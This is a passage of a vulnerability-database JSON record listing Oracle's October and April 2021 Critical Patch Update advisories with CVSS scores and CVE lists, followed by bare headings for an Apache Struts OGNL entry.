below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2809080.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0762", "CVE-2016-1000031", "CVE-2016-2183", "CVE-2016-5018", "CVE-2016-6794", "CVE-2016-6796", "CVE-2016-6797", "CVE-2017-5645", "CVE-2017-9841", "CVE-2018-10237", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-14550", "CVE-2018-15756", "CVE-2018-20031", "CVE-2018-20032", "CVE-2018-20033", "CVE-2018-20034", "CVE-2018-20843", "CVE-2018-8032", "CVE-2018-8088", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0230", "CVE-2019-0233", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-11358", "CVE-2019-12400", "CVE-2019-12415", "CVE-2019-13990", "CVE-2019-16775", "CVE-2019-17195", "CVE-2019-17566", "CVE-2019-17567", "CVE-2019-20388", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5427", "CVE-2019-7317", "CVE-2020-10543", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11979", "CVE-2020-11987", "CVE-2020-11988", "CVE-2020-11994", "CVE-2020-11998", "CVE-2020-12723", "CVE-2020-13947", "CVE-2020-13950", "CVE-2020-13954", "CVE-2020-13956", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-15824", "CVE-2020-17521", "CVE-2020-17530", "CVE-2020-1945", "CVE-2020-1967", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25648", "CVE-2020-25649", "CVE-2020-26116", "CVE-2020-26137", "CVE-2020-26217", "CVE-2020-27193", "CVE-2020-27216", "CVE-2020-27218", "CVE-2020-27824", "CVE-2020-28052", "CVE-2020-28500", "CVE-2020-28928", "CVE-2020-29661", "CVE-2020-35452", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5413", "CVE-2020-6950", "CVE-2020-7065", "CVE-2020-7069", "CVE-2020-7071", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-8203", "CVE-2020-8277", "CVE-2020-8622", "CVE-2020-8908", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548", "CVE-2021-20227", "CVE-2021-20265", "CVE-2021-21290", "CVE-2021-21341", "CVE-2021-21342", "CVE-2021-21343", "CVE-2021-21344", "CVE-2021-21345", "CVE-2021-21346", "CVE-2021-21347", "CVE-2021-21348", "CVE-2021-21349", "CVE-2021-21350", "CVE-2021-21351", "CVE-2021-2137", "CVE-2021-21409", "CVE-2021-21702", "CVE-2021-21783", "CVE-2021-22112", "CVE-2021-22118", "CVE-2021-22207", "CVE-2021-22222", "CVE-2021-22696", "CVE-2021-22883", "CVE-2021-22884", "CVE-2021-22922", "CVE-2021-22923", "CVE-2021-22924", "CVE-2021-22925", "CVE-2021-22926", "CVE-2021-22931", "CVE-2021-22939", "CVE-2021-22940", "CVE-2021-22945", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-2332", "CVE-2021-23336", "CVE-2021-23337", "CVE-2021-2341", "CVE-2021-2351", "CVE-2021-2369", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2388", "CVE-2021-23926", "CVE-2021-2414", "CVE-2021-2416", "CVE-2021-2432", "CVE-2021-2461", "CVE-2021-2471", "CVE-2021-2474", "CVE-2021-2475", "CVE-2021-2476", "CVE-2021-2477", "CVE-2021-2478", "CVE-2021-2479", "CVE-2021-2480", "CVE-2021-2481", "CVE-2021-2482", "CVE-2021-2483", "CVE-2021-2484", "CVE-2021-2485", "CVE-2021-25122", "CVE-2021-25215", "CVE-2021-25329", "CVE-2021-26117", "CVE-2021-26271", "CVE-2021-26272", "CVE-2021-26690", "CVE-2021-26691", "CVE-2021-27290", "CVE-2021-27364", "CVE-2021-27365", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28163", "CVE-2021-28164", "CVE-2021-28165", "CVE-2021-28169", "CVE-2021-28363", "CVE-2021-28657", "CVE-2021-28957", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30369", "CVE-2021-30468", "CVE-2021-30640", "CVE-2021-30641", "CVE-2021-3156", "CVE-2021-31618", "CVE-2021-3177", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-32803", "CVE-2021-32804", "CVE-2021-32808", "CVE-2021-32809", "CVE-2021-33037", "CVE-2021-33503", "CVE-2021-33560", "CVE-2021-3426", "CVE-2021-34428", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34558", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3522", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35536", "CVE-2021-35537", "CVE-2021-35538", "CVE-2021-35539", "CVE-2021-35540", "CVE-2021-35541", "CVE-2021-35542", "CVE-2021-35543", "CVE-2021-35545", "CVE-2021-35546", "CVE-2021-35549", "CVE-2021-35550", "CVE-2021-35551", "CVE-2021-35552", "CVE-2021-35553", "CVE-2021-35554", "CVE-2021-35556", "CVE-2021-35557", "CVE-2021-35558", "CVE-2021-35559", "CVE-2021-35560", "CVE-2021-35561", "CVE-2021-35562", "CVE-2021-35563", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35566", "CVE-2021-35567", "CVE-2021-35568", "CVE-2021-35569", "CVE-2021-35570", "CVE-2021-35571", "CVE-2021-35572", "CVE-2021-35573", "CVE-2021-35574", "CVE-2021-35575", "CVE-2021-35576", "CVE-2021-35577", "CVE-2021-35578", "CVE-2021-35580", "CVE-2021-35581", "CVE-2021-35582", "CVE-2021-35583", "CVE-2021-35584", "CVE-2021-35585", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35589", "CVE-2021-35590", "CVE-2021-35591", "CVE-2021-35592", "CVE-2021-35593", "CVE-2021-35594", "CVE-2021-35595", "CVE-2021-35596", "CVE-2021-35597", "CVE-2021-35598", "CVE-2021-35599", "CVE-2021-35601", "CVE-2021-35602", "CVE-2021-35603", "CVE-2021-35604", "CVE-2021-35606", "CVE-2021-35607", "CVE-2021-35608", "CVE-2021-35609", "CVE-2021-35610", "CVE-2021-35611", "CVE-2021-35612", "CVE-2021-35613", "CVE-2021-35616", "CVE-2021-35617", "CVE-2021-35618", "CVE-2021-35619", "CVE-2021-35620", "CVE-2021-35621", "CVE-2021-35622", "CVE-2021-35623", "CVE-2021-35624", "CVE-2021-35625", "CVE-2021-35626", "CVE-2021-35627", "CVE-2021-35628", "CVE-2021-35629", "CVE-2021-35630", "CVE-2021-35631", "CVE-2021-35632", "CVE-2021-35633", "CVE-2021-35634", "CVE-2021-35635", "CVE-2021-35636", "CVE-2021-35637", "CVE-2021-35638", "CVE-2021-35639", "CVE-2021-35640", "CVE-2021-35641", "CVE-2021-35642", "CVE-2021-35643", "CVE-2021-35644", "CVE-2021-35645", "CVE-2021-35646", "CVE-2021-35647", "CVE-2021-35648", "CVE-2021-35649", "CVE-2021-35650", "CVE-2021-35651", "CVE-2021-35652", "CVE-2021-35653", "CVE-2021-35654", "CVE-2021-35655", "CVE-2021-35656", "CVE-2021-35657", "CVE-2021-35658", "CVE-2021-35659", "CVE-2021-35660", "CVE-2021-35661", "CVE-2021-35662", "CVE-2021-35665", "CVE-2021-35666", "CVE-2021-36090", "CVE-2021-36222", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37695", "CVE-2021-37701", "CVE-2021-37712", "CVE-2021-37713", "CVE-2021-39134", "CVE-2021-39135"], "modified": "2022-01-18T00:00:00", "id": "ORACLE:CPUOCT2021", "href": "https://www.oracle.com/security-alerts/cpuoct2021.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T20:10:35", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 391 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2765149.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2542", "CVE-2016-5725", "CVE-2016-7103", "CVE-2017-1000061", "CVE-2017-12626", "CVE-2017-14735", "CVE-2017-18640", "CVE-2017-5645", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-1285", "CVE-2018-14040", "CVE-2018-14041", "CVE-2018-14042", "CVE-2018-14550", "CVE-2018-14613", "CVE-2018-16884", "CVE-2018-20843", "CVE-2018-8032", "CVE-2019-0219", "CVE-2019-0221", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0230", "CVE-2019-0232", "CVE-2019-0233", "CVE-2019-10072", "CVE-2019-10080", "CVE-2019-10086", "CVE-2019-10098", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10638", "CVE-2019-10639", "CVE-2019-11358", "CVE-2019-11487", "CVE-2019-11599", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-1241", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12423", "CVE-2019-14379", "CVE-2019-14898", "CVE-2019-15218", "CVE-2019-1551", "CVE-2019-16746", "CVE-2019-16942", "CVE-2019-17075", "CVE-2019-17133", "CVE-2019-17195", "CVE-2019-17495", "CVE-2019-17566", "CVE-2019-17571", "CVE-2019-17573", "CVE-2019-17632", "CVE-2019-17638", "CVE-2019-18885", "CVE-2019-19052", "CVE-2019-19063", "CVE-2019-19066", "CVE-2019-19073", "CVE-2019-19074", "CVE-2019-19078", "CVE-2019-19535", "CVE-2019-19922", "CVE-2019-20812", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3773", "CVE-2019-3874", "CVE-2019-3900", "CVE-2019-5063", "CVE-2019-5064", "CVE-2019-5108", "CVE-2019-5428", "CVE-2019-7317", "CVE-2019-8331", "CVE-2020-10188", "CVE-2020-10543", "CVE-2020-10683", "CVE-2020-10751", "CVE-2020-10769", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11612", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11973", "CVE-2020-11979", "CVE-2020-11987", "CVE-2020-11994", "CVE-2020-11998", "CVE-2020-12114", "CVE-2020-12723", "CVE-2020-12771", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13871", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-13943", "CVE-2020-13954", "CVE-2020-13956", "CVE-2020-14039", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-1472", "CVE-2020-15358", "CVE-2020-15586", "CVE-2020-16166", "CVE-2020-16845", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1927", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1967", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24394", "CVE-2020-24553", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-25649", "CVE-2020-26217", "CVE-2020-26418", "CVE-2020-26419", "CVE-2020-26420", "CVE-2020-26421", "CVE-2020-26422", "CVE-2020-27193", "CVE-2020-27216", "CVE-2020-27218", "CVE-2020-27223", "CVE-2020-27841", "CVE-2020-27842", "CVE-2020-27843", "CVE-2020-27844", "CVE-2020-27845", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-5359", "CVE-2020-5360", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-7059", "CVE-2020-7060", "CVE-2020-7069", "CVE-2020-7760", "CVE-2020-7774", "CVE-2020-7919", "CVE-2020-8203", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8908", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9480", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9489", "CVE-2021-2008", "CVE-2021-20227", "CVE-2021-2053", "CVE-2021-21290", "CVE-2021-2134", "CVE-2021-21345", "CVE-2021-2135", "CVE-2021-2136", "CVE-2021-2140", "CVE-2021-2141", "CVE-2021-2142", "CVE-2021-2144", "CVE-2021-2145", "CVE-2021-2146", "CVE-2021-2147", "CVE-2021-2149", "CVE-2021-2150", "CVE-2021-2151", "CVE-2021-2152", "CVE-2021-2153", "CVE-2021-2154", "CVE-2021-2155", "CVE-2021-2156", "CVE-2021-2157", "CVE-2021-2158", "CVE-2021-2159", "CVE-2021-2160", "CVE-2021-2161", "CVE-2021-2162", "CVE-2021-2163", "CVE-2021-2164", "CVE-2021-2166", "CVE-2021-2167", "CVE-2021-2169", "CVE-2021-2170", "CVE-2021-2171", "CVE-2021-2172", "CVE-2021-2173", "CVE-2021-2174", "CVE-2021-2175", "CVE-2021-2177", "CVE-2021-2178", "CVE-2021-2179", "CVE-2021-2180", "CVE-2021-2181", "CVE-2021-2182", "CVE-2021-2183", "CVE-2021-2184", "CVE-2021-2185", "CVE-2021-2186", "CVE-2021-2187", "CVE-2021-2188", "CVE-2021-2189", "CVE-2021-2190", "CVE-2021-2191", "CVE-2021-2192", "CVE-2021-2193", "CVE-2021-2194", "CVE-2021-2195", "CVE-2021-2196", "CVE-2021-2197", "CVE-2021-2198", "CVE-2021-2199", "CVE-2021-2200", "CVE-2021-2201", "CVE-2021-2202", "CVE-2021-2203", "CVE-2021-2204", "CVE-2021-2205", "CVE-2021-2206", "CVE-2021-2207", "CVE-2021-2208", "CVE-2021-2209", "CVE-2021-2210", "CVE-2021-2211", "CVE-2021-22112", "CVE-2021-2212", "CVE-2021-2213", "CVE-2021-2214", "CVE-2021-2215", "CVE-2021-2216", "CVE-2021-2217", "CVE-2021-22173", "CVE-2021-22174", "CVE-2021-2218", "CVE-2021-2219", "CVE-2021-22191", "CVE-2021-2220", "CVE-2021-2221", "CVE-2021-2222", "CVE-2021-2223", "CVE-2021-2224", "CVE-2021-2225", "CVE-2021-2226", "CVE-2021-2227", "CVE-2021-2228", "CVE-2021-2229", "CVE-2021-2230", "CVE-2021-2231", "CVE-2021-2232", "CVE-2021-2233", "CVE-2021-2234", "CVE-2021-2235", "CVE-2021-2236", "CVE-2021-2237", "CVE-2021-2238", "CVE-2021-2239", "CVE-2021-2240", "CVE-2021-2241", "CVE-2021-2242", "CVE-2021-2244", "CVE-2021-2245", "CVE-2021-2246", "CVE-2021-2247", "CVE-2021-2248", "CVE-2021-2249", "CVE-2021-2250", "CVE-2021-2251", "CVE-2021-2252", "CVE-2021-2253", "CVE-2021-2254", "CVE-2021-2255", "CVE-2021-2256", "CVE-2021-2257", "CVE-2021-2258", "CVE-2021-2259", "CVE-2021-2260", "CVE-2021-2261", "CVE-2021-2262", "CVE-2021-2263", "CVE-2021-2264", "CVE-2021-2266", "CVE-2021-2267", "CVE-2021-2268", "CVE-2021-2269", "CVE-2021-2270", "CVE-2021-2271", "CVE-2021-2272", "CVE-2021-2273", "CVE-2021-2274", "CVE-2021-2275", "CVE-2021-2276", "CVE-2021-2277", "CVE-2021-2278", "CVE-2021-2279", "CVE-2021-2280", "CVE-2021-2281", "CVE-2021-2282", "CVE-2021-2283", "CVE-2021-2284", "CVE-2021-2285", "CVE-2021-2286", "CVE-2021-2287", "CVE-2021-2288", "CVE-2021-22883", "CVE-2021-22884", "CVE-2021-2289", "CVE-2021-2290", "CVE-2021-2291", "CVE-2021-2292", "CVE-2021-2293", "CVE-2021-2294", "CVE-2021-2295", "CVE-2021-2296", "CVE-2021-2297", "CVE-2021-2298", "CVE-2021-2299", "CVE-2021-2300", "CVE-2021-2301", "CVE-2021-2302", "CVE-2021-2303", "CVE-2021-2304", "CVE-2021-2305", "CVE-2021-2306", "CVE-2021-2307", "CVE-2021-2308", "CVE-2021-2309", "CVE-2021-2310", "CVE-2021-2311", "CVE-2021-2312", "CVE-2021-2314", "CVE-2021-2315", "CVE-2021-2316", "CVE-2021-2317", "CVE-2021-2318", "CVE-2021-2319", "CVE-2021-2320", "CVE-2021-2321", "CVE-2021-23336", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-3449", "CVE-2021-3450"], "modified": "2021-09-04T00:00:00", "id": "ORACLE:CPUAPR2021", "href": "https://www.oracle.com/security-alerts/cpuapr2021.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Apache Struts double OGNL evaluation

Description

Related